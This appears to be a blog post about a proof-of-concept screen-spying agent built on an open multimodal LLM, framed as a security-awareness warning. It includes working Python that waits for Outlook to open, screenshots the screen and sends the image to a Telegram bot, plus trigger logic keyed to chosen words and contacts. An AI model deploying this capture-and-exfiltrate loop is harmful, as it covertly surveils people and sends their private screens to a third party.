Ever tried turning an open-source LLM into a personal paparazzi? I did, purely as a proof of concept, and it’s both fascinating and a little alarming. I wrote a simple script that waits for Outlook to open, takes a screenshot, and instantly sends it off via Telegram. Classic programming could do the same thing, sure, but here’s the twist: with AI agents, you can configure it to trigger on specific words in an email, or on messages from a certain contact. Suddenly, we’re stepping into a new era of potential security hazards.
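To make the “classic programming” version concrete, here is a minimal sketch of that watch-and-report loop. The library choices (`psutil` for process listing, `mss` for screenshots, `requests` for the Telegram Bot API) and the placeholder token and chat ID are my assumptions for illustration; the original script’s details are not shown here.

```python
import time


def looks_like_outlook(process_names):
    """Return True if any running process name suggests Outlook is open."""
    return any("outlook" in name.lower() for name in process_names)


def watch_loop(poll_seconds=5):
    # Third-party imports deferred so the trigger logic above stays standalone.
    import psutil   # enumerate running processes
    import mss      # capture the screen
    import requests  # call the Telegram Bot API

    TOKEN, CHAT_ID = "<bot-token>", "<chat-id>"  # hypothetical placeholders

    while True:
        names = [p.info["name"] or "" for p in psutil.process_iter(["name"])]
        if looks_like_outlook(names):
            # Grab a full-screen frame and send it to the configured chat.
            with mss.mss() as grabber:
                grabber.shot(output="frame.png")
            with open("frame.png", "rb") as photo:
                requests.post(
                    f"https://api.telegram.org/bot{TOKEN}/sendPhoto",
                    data={"chat_id": CHAT_ID},
                    files={"photo": photo},
                )
        time.sleep(poll_seconds)
```

Even this dumb version illustrates the point: the hard part is not the capture or the exfiltration, both of which are a handful of lines.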

In my little test, a Python script runs in the background, capturing the screen every few seconds. A multimodal LLM analyzes each frame, recognizes particular situations, and behaves intelligently in them (for example, Outlook being opened, or the user sending an email about a specific topic to a specific person). This highlights just how accessible (and powerful) these open LLMs can be. It’s a demonstration of the creative possibilities: from harmless automations to worrisome “spyware” scenarios. As these AI tools become more sophisticated, we have to keep in mind that the line between “helpful agent” and “unwanted eavesdropper” can blur quickly.
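The AI-driven trigger step can be sketched independently of any particular model. Assuming the multimodal LLM returns a plain-text description of each screenshot (the post names no specific model, so this interface is a guess), the decision logic reduces to a few lines:

```python
def should_alert(model_description, trigger_words, trigger_contacts):
    """Decide whether a frame warrants action, given the LLM's text
    description of the screenshot and the configured triggers."""
    text = model_description.lower()
    hit_word = any(word.lower() in text for word in trigger_words)
    hit_contact = any(contact.lower() in text for contact in trigger_contacts)
    return hit_word or hit_contact
```

Here the LLM does the heavy lifting of turning pixels into a description; the agent just matches that description against a watch list of topics and contacts, which is exactly the kind of fuzzy condition that would be painful to hand-code against raw screen contents.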
Yes, if you already have code running on a target PC, there is a lot you can do even without AI. But AI unlocks, with minimal effort, many possibilities that would have required considerable coding complexity if built the old-fashioned way.
With the rise of AI agents, sooner or later people are going to have live assistants in different forms: tech helpers, creative idea counselors, semi-automated agents accompanying them while they browse, and so on. That will open up a whole new world of possibilities and situations we haven’t faced before.
So why talk about it? Because knowledge is the best form of defense. If we understand how these technologies work—and how they might be misused—we’re better equipped to build safeguards. The future of AI is thrilling, but it’s also an invitation to stay vigilant about privacy, ethics, and security. Let’s explore the possibilities responsibly—so we can create innovation that helps us, not haunts us.